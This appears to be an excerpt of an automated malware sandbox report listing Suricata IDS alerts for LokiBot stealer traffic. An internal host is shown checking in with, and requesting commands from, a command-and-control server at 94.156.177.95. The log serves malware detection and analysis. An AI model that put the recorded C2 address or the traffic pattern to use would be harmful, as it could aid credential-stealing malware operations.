                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50035 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50040 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49845 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49999 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49845 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50014
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50042 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49889
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50049 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50049 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49845
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50041 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50030 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50030 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50043 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50043 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50043 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49862 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50053 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50044 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50043 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50044 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50040 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50053
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50035 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49869 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49935 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50042 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50026 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50042 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50026 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50049 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50041 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49941
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49862 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50042 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49862 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50026
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50024 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49897 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50024 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50033
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50024 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49869 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50056 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50029 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50044 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50030 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50041 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50049 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50040
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50049 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50035
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50030 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50030 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50038
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49897 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50056 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50049
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50029 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49947 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50029 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50029 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50044 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49947 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49869
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49965 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49965 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49952 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49897 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50056 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50024 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50030
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50043 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50024 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50027 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50029
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50027 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50056 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50027 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49935
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49952 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49862 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50041
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49947 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50027 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50027 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49999
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49976 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50042 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50043
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49959 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50056 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49959 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49959 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49862 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49897
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50056
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49976 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49952 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50024
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50032 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50032 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49952 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49976 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49885 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50028
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50044
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49915 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49901 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50032 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49976 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49976 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50042
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49947 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49959 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49965 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50054 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50054 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50054 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49952 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49965 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49931 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49991 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50054 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49952
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49991 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50054 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49959 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49931 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50057 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50032 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49901 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49976
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49862
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49991 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50027
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49965 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50057 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49931 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50036 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49885 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50032 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49901 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49885 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49959
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50051 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50051 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50051 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49931 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49931 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50036 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50031 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49915 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49965
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49915 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50057 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49931
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50032
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50057 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50057 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50045 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49901 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50045 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50054
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49901 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50036 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50051 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50051 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49991 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50045 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49991 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49885 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50031 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49885 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50031 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50036 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50036 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50031 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50045 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50031 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49991
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50037 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50037 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50037 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50006 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50006 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50006 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50037 -> 94.156.177.95:80
